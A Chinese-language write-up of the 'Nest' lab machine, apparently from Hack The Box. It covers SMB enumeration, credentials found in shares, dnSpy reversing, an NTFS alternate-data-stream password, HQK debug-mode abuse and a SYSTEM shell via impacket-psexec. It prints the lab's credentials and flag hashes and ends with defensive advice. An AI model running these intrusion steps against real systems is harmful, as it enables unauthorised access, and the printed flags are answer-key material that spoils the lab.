[Meachines] [Medium] Nest .NET 逆向工程+Notepad配置泄露+VB Projects分析+dnSpy动态调试+NTFS 备用ADS攻击+HQK程序调试解密
字数 1366 2025-08-20 18:18:11

HQK Reporting Service 渗透测试教学文档

1. 信息收集阶段

1.1 端口扫描

使用Nmap进行端口扫描,发现开放端口:

  • 445/tcp (Microsoft-DS/SMB)
  • 4386/tcp (HQK Reporting Service V1.2)

Nmap命令:

nmap -p- 10.10.10.178 --min-rate 1000 -sC -sV

1.2 HQK Reporting Service分析

4386端口运行HQK Reporting Service V1.2,可用命令:

  • LIST
  • SETDIR <Directory_Name>
  • RUNQUERY <Query_ID>
  • DEBUG
  • HELP

2. SMB服务枚举

2.1 匿名访问

尝试匿名访问SMB共享:

smbmap -H 10.10.10.178 -u null
smbclient -N //10.10.10.178/data

2.2 获取初始凭据

Shared/Templates/HR/Welcome Email.txt中发现凭据:

  • 用户名: TempUser
  • 密码: welcome2019

2.3 使用凭据访问

使用获取的凭据访问SMB共享:

smbmap -H 10.10.10.178 -u TempUser -p welcome2019
smbclient -U TempUser //10.10.10.178/data

发现加密的配置文件IT/Configs/RU Scanner/RU_config.xml

3. Notepad++配置泄露

访问Secure$共享获取Notepad++配置:

smbclient -U TempUser //10.10.10.178/Secure$
cd IT\Carl
mget *

分析VB Projects中的代码VB Projects/WIP/RU/RUScanner/Module1.vb,发现从XML配置文件加载配置信息的功能。

4. dnSpy逆向分析

使用dnSpy工具分析.NET程序:

  1. 下载dnSpy:https://github.com/dnSpy/dnSpy/releases
  2. 打开可执行文件进行分析

发现凭据:

  • 用户名: C.Smith
  • 密码: xRxRxPANCAK3SxRxRx

5. 权限提升

5.1 获取用户凭据

使用C.Smith凭据访问SMB:

smbmap -H 10.10.10.178 -u C.Smith -p xRxRxPANCAK3SxRxRx
smbclient -U C.Smith //10.10.10.178/users

获取user.txt:16c744bbc301be8fe8816169e1f29b78

5.2 NTFS备用数据流(ADS)分析

检查Debug Mode Password.txt的备用数据流:

allinfo "C.Smith/HQK Reporting/Debug Mode Password.txt"

发现备用数据流包含密码:

get "Debug Mode Password.txt:Password"

获取密码:WBQ201953D8w

5.3 HQK Reporting Service调试

使用获取的密码进入调试模式:

rlwrap telnet 10.10.10.178 4386
> debug WBQ201953D8w
> SETDIR ..
> LIST
> SETDIR LDAP
> showquery 2

分析LDAP查询代码,发现配置文件格式:

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

5.4 密码解密

分析代码发现密码使用CR.DS方法解密,解密后获得管理员密码:

  • 密码: XtH4nkS4Pl4y1nGX

6. 最终权限获取

使用psexec获取系统权限:

impacket-psexec administrator:XtH4nkS4Pl4y1nGX@10.10.10.178

获取root.txt:85d4497ec0807330257a23e9f866a599

7. 关键知识点总结

  1. SMB枚举:通过匿名访问获取初始凭据
  2. 配置泄露:Notepad++配置和VB项目代码分析
  3. .NET逆向:使用dnSpy工具分析.NET程序
  4. NTFS ADS:利用备用数据流获取隐藏信息
  5. 服务调试:HQK Reporting Service的调试功能利用
  6. 密码解密:分析代码中的加密方法进行解密
  7. 横向移动:使用获取的凭据进行权限提升

8. 防御建议

  1. 限制SMB共享的匿名访问
  2. 避免在配置文件中存储明文或弱加密的凭据
  3. 禁用不必要的调试功能
  4. 定期审计NTFS备用数据流
  5. 使用强密码和适当的加密方法
  6. 限制服务账户的权限
HQK Reporting Service 渗透测试教学文档 1. 信息收集阶段 1.1 端口扫描 使用Nmap进行端口扫描,发现开放端口: 445/tcp (Microsoft-DS/SMB) 4386/tcp (HQK Reporting Service V1.2) Nmap命令: 1.2 HQK Reporting Service分析 4386端口运行HQK Reporting Service V1.2,可用命令: LIST SETDIR <Directory_ Name> RUNQUERY <Query_ ID> DEBUG HELP 2. SMB服务枚举 2.1 匿名访问 尝试匿名访问SMB共享: 2.2 获取初始凭据 在 Shared/Templates/HR/Welcome Email.txt 中发现凭据: 用户名: TempUser 密码: welcome2019 2.3 使用凭据访问 使用获取的凭据访问SMB共享: 发现加密的配置文件 IT/Configs/RU Scanner/RU_config.xml 3. Notepad++配置泄露 访问Secure$共享获取Notepad++配置: 分析VB Projects中的代码 VB Projects/WIP/RU/RUScanner/Module1.vb ,发现从XML配置文件加载配置信息的功能。 4. dnSpy逆向分析 使用dnSpy工具分析.NET程序: 下载dnSpy:https://github.com/dnSpy/dnSpy/releases 打开可执行文件进行分析 发现凭据: 用户名: C.Smith 密码: xRxRxPANCAK3SxRxRx 5. 权限提升 5.1 获取用户凭据 使用C.Smith凭据访问SMB: 获取user.txt:16c744bbc301be8fe8816169e1f29b78 5.2 NTFS备用数据流(ADS)分析 检查 Debug Mode Password.txt 的备用数据流: 发现备用数据流包含密码: 获取密码:WBQ201953D8w 5.3 HQK Reporting Service调试 使用获取的密码进入调试模式: 分析LDAP查询代码,发现配置文件格式: 5.4 密码解密 分析代码发现密码使用CR.DS方法解密,解密后获得管理员密码: 密码: XtH4nkS4Pl4y1nGX 6. 最终权限获取 使用psexec获取系统权限: 获取root.txt:85d4497ec0807330257a23e9f866a599 7. 关键知识点总结 SMB枚举 :通过匿名访问获取初始凭据 配置泄露 :Notepad++配置和VB项目代码分析 .NET逆向 :使用dnSpy工具分析.NET程序 NTFS ADS :利用备用数据流获取隐藏信息 服务调试 :HQK Reporting Service的调试功能利用 密码解密 :分析代码中的加密方法进行解密 横向移动 :使用获取的凭据进行权限提升 8. 防御建议 限制SMB共享的匿名访问 避免在配置文件中存储明文或弱加密的凭据 禁用不必要的调试功能 定期审计NTFS备用数据流 使用强密码和适当的加密方法 限制服务账户的权限